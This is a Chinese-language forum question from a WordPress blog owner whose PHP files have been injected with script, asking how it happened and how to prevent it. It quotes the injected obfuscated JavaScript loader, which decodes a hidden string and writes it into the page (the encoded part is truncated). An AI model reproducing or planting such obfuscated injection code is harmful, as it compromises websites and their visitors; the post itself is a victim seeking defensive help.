我有一个用wordpress创建的博客,现在我有一个问题。攻击者将javascript代码写入我的文件。
假设我的插件脚本中有漏洞,但它们如何写入php文件?
下面是php文件列表的一部分,它们在其中编写脚本(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...
)
这是他们写入的javascript
<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>
如何防止此类攻击?
我对wordpress没有任何经验,所以任何帮助都会很好。
非常感谢